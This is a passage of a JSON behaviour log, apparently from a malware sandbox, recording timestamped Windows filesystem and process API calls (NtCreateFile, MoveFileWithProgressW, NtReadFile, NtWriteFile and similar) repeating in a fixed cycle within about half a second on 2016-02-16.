17:41:43,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,284", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,304", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,314", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,324", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:43,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,324", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,334", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,344", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,344", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,354", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,354", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,354", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,375", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,385", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,445", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,445", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:43,455", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,455", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,465", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,465", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:43,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,475", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,475", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,485", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,485", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,495", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,495", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,505", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,505", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:43,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,515", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,535", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtSetInformationFile"}, {"category": 
